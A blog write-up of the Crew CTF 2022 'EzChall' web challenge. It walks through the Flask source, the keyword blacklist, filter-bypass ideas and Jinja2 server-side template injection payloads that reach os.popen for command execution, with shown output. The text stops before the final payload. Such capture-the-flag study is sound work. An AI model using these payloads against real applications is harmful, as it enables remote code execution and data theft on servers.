<!DOCTYPE html><html lang="en"> <head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Crew CTF 2022 – EzChall &amp; EzChall Again · ElleuchX1</title><meta name="description" content="Blind SSTI with filters"><link rel="icon" href="/favicon.svg" type="image/svg+xml"><link rel="alternate" type="application/rss+xml" title="ElleuchX1" href="/rss.xml"><meta property="og:title" content="Crew CTF 2022 – EzChall &#38; EzChall Again · ElleuchX1"><meta property="og:description" content="Blind SSTI with filters"><meta property="og:type" content="article"><meta property="og:url" content="https://elleu.ch/posts/Ezchall-crewctf/"><meta property="og:image" content="https://elleu.ch/og/Ezchall-crewctf.png"><meta name="twitter:card" content="summary_large_image"><meta name="twitter:image" content="https://elleu.ch/og/Ezchall-crewctf.png"><script>
      (function () {
        try {
          var t = localStorage.getItem('theme');
          if (!t) t = window.matchMedia('(prefers-color-scheme: dark)').matches ? 'dark' : 'light';
          document.documentElement.setAttribute('data-theme', t);
        } catch (e) {}
      })();
      document.addEventListener('keydown', function (e) {
        if (e.key !== '/' || e.metaKey || e.ctrlKey || e.altKey) return;
        var t = e.target;
        if (t && (t.tagName === 'INPUT' || t.tagName === 'TEXTAREA' || t.isContentEditable)) return;
        e.preventDefault();
        window.location.href = '/search/';
      });
    </script><link rel="stylesheet" href="/_astro/_id_.mL4ELXTH.css"></head> <body> <a class="skip" href="#main">skip to content</a> <header class="site-header" data-pagefind-ignore> <div class="inner"> <a class="brand" href="/">elleuch<span class="at">:~$</span></a> <nav class="nav" aria-label="Main"> <a href="/posts/" aria-current="page">Posts</a><a href="/tags/">Tags</a><a href="/about/">About</a> <a class="search" href="/search/"><kbd>/</kbd></a> <button class="toggle" id="theme-toggle" type="button" aria-label="Toggle theme"> <svg class="i-moon" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"> <path d="M21 12.8A9 9 0 1 1 11.2 3a7 7 0 0 0 9.8 9.8z"></path> </svg> <svg class="i-sun" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"> <circle cx="12" cy="12" r="4"></circle> <path d="M12 2v2M12 20v2M4.9 4.9l1.4 1.4M17.7 17.7l1.4 1.4M2 12h2M20 12h2M4.9 19.1l1.4-1.4M17.7 6.3l1.4-1.4"></path> </svg> </button> <script>
  document.getElementById('theme-toggle')?.addEventListener('click', () => {
    const next = document.documentElement.getAttribute('data-theme') === 'dark' ? 'light' : 'dark';
    document.documentElement.setAttribute('data-theme', next);
    try { localStorage.setItem('theme', next); } catch (e) {}
  });
</script> </nav> </div> </header> <main id="main">  <div class="progress" id="progress"></div> <div class="wrap"> <article class="article" data-pagefind-body> <a class="back" href="/posts/">← Posts</a> <header class="article-head"> <h1 data-pagefind-meta="title">Crew CTF 2022 – EzChall &amp; EzChall Again</h1> <div class="article-meta"> <time datetime="2022-04-17T00:00:00.000Z">2022-04-17</time> <span>6 min read</span> </div> <div class="article-tags"> <a href="/tags/ctf/">#CTF</a><a href="/tags/web/">#Web</a><a href="/tags/crew-ctf-2022/">#CREW CTF 2022</a><a href="/tags/ssti/">#SSTI</a><a href="/tags/filter/">#Filter</a> </div> </header>  <div class="prose">  <h1 id="ezchall-web-906">EzChall (Web, 906)</h1>
<blockquote>
<p>I am looking for a way out for myself, can you help me?<br>
Author: Nino#5160</p>
<p><a href="http://ezchall.crewctf-2022.crewc.tf:1337/">http://ezchall.crewctf-2022.crewc.tf:1337/</a><br>
Mirror: <a href="http://193.105.207.19:8005/">http://193.105.207.19:8005/</a></p>
<p>Attachment: ExChall.zip</p>
</blockquote>
<p>In this blogpost, I’ll be showcasing my thought proccess of solving these two challenges.</p>
<p>So, we’re given the source code of the application.</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>src</span></span>
<span class="line"><span>    templates</span></span>
<span class="line"><span>    app.py</span></span>
<span class="line"><span>    filter.py</span></span>
<span class="line"><span>    mybase64.py</span></span>
<span class="line"><span>    requirements.txt</span></span>
<span class="line"><span>docker-compose.yml</span></span>
<span class="line"><span>Dockerfile</span></span>
<span class="line"><span>flag</span></span></code></pre>
<p>Let’s first start by poking at <code>app.py</code> where we have 2 Routes (login/dashboard).</p>
<p>Nothing interesting in the second route other than the admin hardcoded credentials</p>
<blockquote>
<p><code>admin</code>: <code>cGFzcyBpcyBhZG1pbiA/Pw==</code></p>
</blockquote>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#F97583">def</span><span style="color:#B392F0"> login</span><span style="color:#E1E4E8">():</span></span>
<span class="line"><span style="color:#F97583">	if</span><span style="color:#9ECBFF"> 'user'</span><span style="color:#F97583"> in</span><span style="color:#E1E4E8"> session:</span></span>
<span class="line"><span style="color:#F97583">		return</span><span style="color:#E1E4E8"> redirect(url_for(</span><span style="color:#9ECBFF">'dashboard'</span><span style="color:#E1E4E8">))</span></span>
<span class="line"><span style="color:#F97583">	else</span><span style="color:#E1E4E8">:</span></span>
<span class="line"><span style="color:#F97583">		if</span><span style="color:#E1E4E8"> request.method </span><span style="color:#F97583">==</span><span style="color:#9ECBFF"> "POST"</span><span style="color:#E1E4E8">:</span></span>
<span class="line"><span style="color:#E1E4E8">			user, passwd </span><span style="color:#F97583">=</span><span style="color:#9ECBFF"> ''</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">''</span></span>
<span class="line"><span style="color:#E1E4E8">			user </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> request.form[</span><span style="color:#9ECBFF">'user'</span><span style="color:#E1E4E8">]</span></span>
<span class="line"><span style="color:#E1E4E8">			passwd </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> request.form[</span><span style="color:#9ECBFF">'passwd'</span><span style="color:#E1E4E8">]</span></span>
<span class="line"><span style="color:#F97583">			if</span><span style="color:#E1E4E8"> user </span><span style="color:#F97583">==</span><span style="color:#9ECBFF"> 'admin'</span><span style="color:#F97583"> and</span><span style="color:#E1E4E8"> bdecode(passwd) </span><span style="color:#F97583">==</span><span style="color:#9ECBFF"> 'pass is admin ??'</span><span style="color:#F97583"> and</span><span style="color:#79B8FF"> len</span><span style="color:#E1E4E8">(passwd) </span><span style="color:#F97583">==</span><span style="color:#79B8FF"> 24</span><span style="color:#F97583"> and</span><span style="color:#E1E4E8"> passwd </span><span style="color:#F97583">!=</span><span style="color:#9ECBFF"> 'cGFzcyBpcyBhZG1pbiA/Pw=='</span><span style="color:#E1E4E8">:</span></span>
<span class="line"><span style="color:#E1E4E8">				session[</span><span style="color:#9ECBFF">'user'</span><span style="color:#E1E4E8">] </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> user</span></span>
<span class="line"><span style="color:#F97583">				return</span><span style="color:#E1E4E8"> redirect(url_for(</span><span style="color:#9ECBFF">'dashboard'</span><span style="color:#E1E4E8">))</span></span>
<span class="line"><span style="color:#F97583">			return</span><span style="color:#E1E4E8"> render_template(</span><span style="color:#9ECBFF">'login.html'</span><span style="color:#E1E4E8">, </span><span style="color:#FFAB70">msg</span><span style="color:#F97583">=</span><span style="color:#9ECBFF">'Incorrect !'</span><span style="color:#E1E4E8">)</span></span>
<span class="line"><span style="color:#F97583">		return</span><span style="color:#E1E4E8"> render_template(</span><span style="color:#9ECBFF">'login.html'</span><span style="color:#E1E4E8">)</span></span></code></pre>
<p>For the dashboard endpoint, we have a straightforward blind SSTI vulnerability if the we validate the checker <code>check_filter</code>.</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#F97583">def</span><span style="color:#B392F0"> dashboard</span><span style="color:#E1E4E8">():</span></span>
<span class="line"><span style="color:#F97583">	if</span><span style="color:#9ECBFF"> 'user'</span><span style="color:#F97583"> not</span><span style="color:#F97583"> in</span><span style="color:#E1E4E8"> session:</span></span>
<span class="line"><span style="color:#F97583">			return</span><span style="color:#E1E4E8"> redirect(url_for(</span><span style="color:#9ECBFF">'login'</span><span style="color:#E1E4E8">))</span></span>
<span class="line"><span style="color:#F97583">	else</span><span style="color:#E1E4E8">:</span></span>
<span class="line"><span style="color:#F97583">		if</span><span style="color:#E1E4E8"> request.args.get(</span><span style="color:#9ECBFF">'payload'</span><span style="color:#E1E4E8">) </span><span style="color:#F97583">is</span><span style="color:#F97583"> not</span><span style="color:#79B8FF"> None</span><span style="color:#E1E4E8">:</span></span>
<span class="line"><span style="color:#E1E4E8">			payload </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> request.args.get(</span><span style="color:#9ECBFF">'payload'</span><span style="color:#E1E4E8">)</span></span>
<span class="line"><span style="color:#F97583">			if</span><span style="color:#E1E4E8"> check_filter(payload):</span></span>
<span class="line"><span style="color:#E1E4E8">				render_template_string(payload)</span></span>
<span class="line"><span style="color:#F97583">			return</span><span style="color:#9ECBFF"> 'I believe you can overcome this difficulty >&#x3C;'</span></span>
<span class="line"><span style="color:#F97583">		return</span><span style="color:#9ECBFF"> 'miss params'</span></span>
<span class="line"></span></code></pre>
<p>Now let’s start fun part and check how it’s validating the payload.</p>
<p>I got a bit cocky at first sight and thought this was a typical blind SSTI and rushed copying one of my go-to SSTI payloads and then noticed that <code>request</code>/<code>join</code>/<code>attr</code>/<code>print</code> was filtered and gave up on the typical payloads at this point.</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#F97583">import</span><span style="color:#E1E4E8"> string</span></span>
<span class="line"></span>
<span class="line"><span style="color:#79B8FF">UNALLOWED</span><span style="color:#F97583"> =</span><span style="color:#E1E4E8"> [</span></span>
<span class="line"><span style="color:#9ECBFF"> 'class'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'mro'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'init'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'builtins'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'request'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'app'</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">'sleep'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'add'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'+'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'config'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'subclasses'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'format'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'dict'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'get'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'attr'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'globals'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'time'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'read'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'import'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'sys'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'cookies'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'headers'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'doc'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'url'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'encode'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'decode'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'chr'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'ord'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'replace'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'echo'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'base'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'self'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'template'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'print'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'exec'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'response'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'join'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'cat'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'</span><span style="color:#79B8FF">%s</span><span style="color:#9ECBFF">'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'</span><span style="color:#79B8FF">{}</span><span style="color:#9ECBFF">'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'</span><span style="color:#79B8FF">\\</span><span style="color:#9ECBFF">'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'*'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'&#x26;'</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">"</span><span style="color:#79B8FF">{{</span><span style="color:#9ECBFF">"</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">"</span><span style="color:#79B8FF">}}</span><span style="color:#9ECBFF">"</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'[]'</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">"''"</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">'""'</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">'|'</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">'='</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">'~'</span><span style="color:#E1E4E8">]</span></span>
<span class="line"></span>
<span class="line"></span>
<span class="line"><span style="color:#F97583">def</span><span style="color:#B392F0"> check_filter</span><span style="color:#E1E4E8">(input):</span></span>
<span class="line"><span style="color:#79B8FF">    input</span><span style="color:#F97583"> =</span><span style="color:#79B8FF"> input</span><span style="color:#E1E4E8">.lower()</span></span>
<span class="line"><span style="color:#F97583">    if</span><span style="color:#79B8FF"> input</span><span style="color:#E1E4E8">.count(</span><span style="color:#9ECBFF">'.'</span><span style="color:#E1E4E8">) </span><span style="color:#F97583">></span><span style="color:#79B8FF"> 1</span><span style="color:#F97583"> or</span><span style="color:#79B8FF"> input</span><span style="color:#E1E4E8">.count(</span><span style="color:#9ECBFF">':'</span><span style="color:#E1E4E8">) </span><span style="color:#F97583">></span><span style="color:#79B8FF"> 1</span><span style="color:#F97583"> or</span><span style="color:#79B8FF"> input</span><span style="color:#E1E4E8">.count(</span><span style="color:#9ECBFF">'/'</span><span style="color:#E1E4E8">) </span><span style="color:#F97583">></span><span style="color:#79B8FF"> 1</span><span style="color:#E1E4E8">:</span></span>
<span class="line"><span style="color:#F97583">        return</span><span style="color:#79B8FF"> False</span></span>
<span class="line"><span style="color:#F97583">    if</span><span style="color:#79B8FF"> len</span><span style="color:#E1E4E8">(</span><span style="color:#79B8FF">input</span><span style="color:#E1E4E8">) </span><span style="color:#F97583">&#x3C;</span><span style="color:#79B8FF"> 115</span><span style="color:#E1E4E8">:</span></span>
<span class="line"><span style="color:#F97583">        for</span><span style="color:#E1E4E8"> char </span><span style="color:#F97583">in</span><span style="color:#79B8FF"> input</span><span style="color:#E1E4E8">:</span></span>
<span class="line"><span style="color:#F97583">            if</span><span style="color:#E1E4E8"> char </span><span style="color:#F97583">in</span><span style="color:#E1E4E8"> string.digits:</span></span>
<span class="line"><span style="color:#F97583">                return</span><span style="color:#79B8FF"> False</span></span>
<span class="line"><span style="color:#F97583">        for</span><span style="color:#E1E4E8"> i </span><span style="color:#F97583">in</span><span style="color:#79B8FF"> UNALLOWED</span><span style="color:#E1E4E8">:</span></span>
<span class="line"><span style="color:#F97583">            if</span><span style="color:#E1E4E8"> i </span><span style="color:#F97583">in</span><span style="color:#79B8FF"> input</span><span style="color:#E1E4E8">:</span></span>
<span class="line"><span style="color:#F97583">                return</span><span style="color:#79B8FF"> False</span></span>
<span class="line"><span style="color:#F97583">        return</span><span style="color:#79B8FF"> True</span></span>
<span class="line"><span style="color:#F97583">    return</span><span style="color:#79B8FF"> False</span></span></code></pre>
<p>Now let’s find out what’s going on here.</p>
<p>The first thing to notice is the first if statement, we’ll need only one of these to be true to get past it due to the usage of the OR operator.</p>
<p>Which I wish I have noticed earlier, as I was trying to forge <code>/</code> with <code>${PWD%${PWD#?}}</code> and ended up giving up on it because it was ending with <code>}}</code> and limited length.</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="sh"><code><span class="line"><span style="color:#B392F0">$</span><span style="color:#9ECBFF"> cat</span><span style="color:#9ECBFF"> "${</span><span style="color:#E1E4E8">PWD</span><span style="color:#F97583">%</span><span style="color:#9ECBFF">${</span><span style="color:#E1E4E8">PWD</span><span style="color:#F97583">#</span><span style="color:#9ECBFF">?}}"flag</span></span>
<span class="line"><span style="color:#B392F0">crew</span><span style="color:#9ECBFF">{fakeflag}</span><span style="color:#B392F0">$</span></span></code></pre>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#F97583">if</span><span style="color:#79B8FF"> input</span><span style="color:#E1E4E8">.count(</span><span style="color:#9ECBFF">'.'</span><span style="color:#E1E4E8">) </span><span style="color:#F97583">></span><span style="color:#79B8FF"> 1</span><span style="color:#F97583"> or</span><span style="color:#79B8FF"> input</span><span style="color:#E1E4E8">.count(</span><span style="color:#9ECBFF">':'</span><span style="color:#E1E4E8">) </span><span style="color:#F97583">></span><span style="color:#79B8FF"> 1</span><span style="color:#F97583"> or</span><span style="color:#79B8FF"> input</span><span style="color:#E1E4E8">.count(</span><span style="color:#9ECBFF">'/'</span><span style="color:#E1E4E8">) </span><span style="color:#F97583">></span><span style="color:#79B8FF"> 1</span><span style="color:#E1E4E8"> :</span></span></code></pre>
<p>Also, a thing to keep in mind the length limit. so we need to have a limited payload size.</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#F97583">if</span><span style="color:#79B8FF"> len</span><span style="color:#E1E4E8">(</span><span style="color:#79B8FF">input</span><span style="color:#E1E4E8">) </span><span style="color:#F97583">&#x3C;</span><span style="color:#79B8FF"> 115</span></span></code></pre>
<p>Moreover, We can’t use digits so we can’t bypass the blacklist with Unicode.</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#F97583">if</span><span style="color:#E1E4E8"> char </span><span style="color:#F97583">in</span><span style="color:#E1E4E8"> string.digits:</span></span>
<span class="line"><span style="color:#F97583">	return</span><span style="color:#79B8FF"> False</span></span></code></pre>
<p>Finally, the blacklist.</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#79B8FF">UNALLOWED</span><span style="color:#F97583"> =</span><span style="color:#E1E4E8"> [</span></span>
<span class="line"><span style="color:#9ECBFF"> 'class'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'mro'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'init'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'builtins'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'request'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'app'</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">'sleep'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'add'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'+'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'config'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'subclasses'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'format'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'dict'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'get'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'attr'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'globals'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'time'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'read'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'import'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'sys'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'cookies'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'headers'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'doc'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'url'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'encode'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'decode'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'chr'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'ord'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'replace'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'echo'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'base'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'self'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'template'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'print'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'exec'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'response'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'join'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'cat'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'</span><span style="color:#79B8FF">%s</span><span style="color:#9ECBFF">'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'</span><span style="color:#79B8FF">{}</span><span style="color:#9ECBFF">'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'</span><span style="color:#79B8FF">\\</span><span style="color:#9ECBFF">'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'*'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'&#x26;'</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">"</span><span style="color:#79B8FF">{{</span><span style="color:#9ECBFF">"</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">"</span><span style="color:#79B8FF">}}</span><span style="color:#9ECBFF">"</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'[]'</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">"''"</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">'""'</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">'|'</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">'='</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">'~'</span><span style="color:#E1E4E8">]</span></span></code></pre>
<p>I’ve added few debugging <code>print</code>s and an input to the filter to test the payloads that I create.</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#79B8FF">input</span><span style="color:#F97583">=</span><span style="color:#79B8FF">input</span><span style="color:#E1E4E8">(</span><span style="color:#9ECBFF">"> "</span><span style="color:#E1E4E8">)</span></span>
<span class="line"><span style="color:#79B8FF">print</span><span style="color:#E1E4E8">(check_filter(</span><span style="color:#79B8FF">input</span><span style="color:#E1E4E8">))</span></span>
<span class="line"><span style="color:#79B8FF">print</span><span style="color:#E1E4E8">(</span><span style="color:#9ECBFF">"[.] "</span><span style="color:#F97583">+</span><span style="color:#79B8FF">str</span><span style="color:#E1E4E8">(</span><span style="color:#79B8FF">input</span><span style="color:#E1E4E8">.count(</span><span style="color:#9ECBFF">'.'</span><span style="color:#E1E4E8">)))</span></span>
<span class="line"><span style="color:#79B8FF">print</span><span style="color:#E1E4E8">(</span><span style="color:#9ECBFF">"[/] "</span><span style="color:#F97583">+</span><span style="color:#79B8FF">str</span><span style="color:#E1E4E8">(</span><span style="color:#79B8FF">input</span><span style="color:#E1E4E8">.count(</span><span style="color:#9ECBFF">'/'</span><span style="color:#E1E4E8">)))</span></span>
<span class="line"><span style="color:#79B8FF">print</span><span style="color:#E1E4E8">(</span><span style="color:#9ECBFF">"[:] "</span><span style="color:#F97583">+</span><span style="color:#79B8FF">str</span><span style="color:#E1E4E8">(</span><span style="color:#79B8FF">input</span><span style="color:#E1E4E8">.count(</span><span style="color:#9ECBFF">':'</span><span style="color:#E1E4E8">)))</span></span>
<span class="line"><span style="color:#79B8FF">print</span><span style="color:#E1E4E8">(</span><span style="color:#9ECBFF">"[Len] "</span><span style="color:#F97583">+</span><span style="color:#79B8FF"> str</span><span style="color:#E1E4E8">(</span><span style="color:#79B8FF">len</span><span style="color:#E1E4E8">(</span><span style="color:#79B8FF">input</span><span style="color:#E1E4E8">))</span></span></code></pre>
<p>So, to summarize, we have a blind SSTI with some interesting blacklist and length limited.</p>
<p>We can make a small skeleton for our payload.</p>
<ul>
<li>
<p>It’s a blind SSTI, we don’t really choices here, it’s either making it timing based which can take some space in the payload or just simply creating a new cookie to exfiltrate data using <code>session.update</code></p>
</li>
<li>
<p><code>{{</code> and <code>}}</code> are filtered, so we’ll probably use <code>{%</code></p>
</li>
</ul>
<p>So, for now our payload will be something like that</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#E1E4E8">{</span><span style="color:#F97583">%if</span><span style="color:#E1E4E8"> session.update({</span><span style="color:#9ECBFF">'f'</span><span style="color:#E1E4E8">:somepayload})</span><span style="color:#F97583">%</span><span style="color:#E1E4E8">}{</span><span style="color:#F97583">%</span><span style="color:#E1E4E8">endif</span><span style="color:#F97583">%</span><span style="color:#E1E4E8">}</span></span></code></pre>
<p>At this point, we’re more limited in the actual length of our payload. While i was searching for a smaller payload i came a cross <a href="https://podalirius.net/en/publications/grehack-2021-optimizing-ssti-payloads-for-jinja2/GreHack_2021_-_Optimizing_Server_Side_Template_Injections_payloads_for_jinja2_slides.pdf">a presentation from <code>Grehack 2021</code> by @Podalirius</a>
which has some interesting payloads and they’re can be found in <a href="https://github.com/swisskyrepo/PayloadsAllTheThings">PayloadsAllTheThings</a>.</p>
<p>I’ll be using another payload later because of the length limit issue, This is how I originally started the challenge. They’ll be in use for the next challenge.</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#E1E4E8">cycler.</span><span style="color:#79B8FF">__init__</span><span style="color:#E1E4E8">.</span><span style="color:#79B8FF">__globals__</span><span style="color:#E1E4E8">.os.popen(</span><span style="color:#9ECBFF">'id'</span><span style="color:#E1E4E8">).read()</span></span>
<span class="line"><span style="color:#E1E4E8">joiner.</span><span style="color:#79B8FF">__init__</span><span style="color:#E1E4E8">.</span><span style="color:#79B8FF">__globals__</span><span style="color:#E1E4E8">.os.popen(</span><span style="color:#9ECBFF">'id'</span><span style="color:#E1E4E8">).read()</span></span>
<span class="line"><span style="color:#E1E4E8">namespace.</span><span style="color:#79B8FF">__init__</span><span style="color:#E1E4E8">.</span><span style="color:#79B8FF">__globals__</span><span style="color:#E1E4E8">.os.popen(</span><span style="color:#9ECBFF">'id'</span><span style="color:#E1E4E8">).read()</span></span></code></pre>
<p>I’ll continue with the first one and to make it easier to deal with blacklisted words and also the count of dots. I’ll change it to this format</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#E1E4E8">cycler[</span><span style="color:#9ECBFF">'__init__'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'__globals__'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'os'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'popen'</span><span style="color:#E1E4E8">](</span><span style="color:#9ECBFF">'id'</span><span style="color:#E1E4E8">)[</span><span style="color:#9ECBFF">'read'</span><span style="color:#E1E4E8">]()</span></span></code></pre>
<p>First, i tried to use <code>[::-1]</code> to reverse the string, then i remembered that digits were filtered. we also can’t use <code>+</code> to concatenate the strings as it was filtered</p>
<p>I tried to use format string with int() but ended up failing. - Completely overthinking it</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="python"><code><span class="line"><span style="color:#F97583">>>></span><span style="color:#E1E4E8"> Template(</span><span style="color:#9ECBFF">"My name is </span><span style="color:#79B8FF">{{</span><span style="color:#9ECBFF">cycler['__tini__'[::-1]]['__slabolg__'[::-1]].os.popen('id').read()</span><span style="color:#79B8FF">}}</span><span style="color:#9ECBFF">"</span><span style="color:#E1E4E8">).render()</span></span>
<span class="line"><span style="color:#9ECBFF">'My name is uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floopy),27(sudo),29(audio),30(dip),142(kaboxer)</span><span style="color:#79B8FF">\n</span><span style="color:#9ECBFF">'</span></span></code></pre>
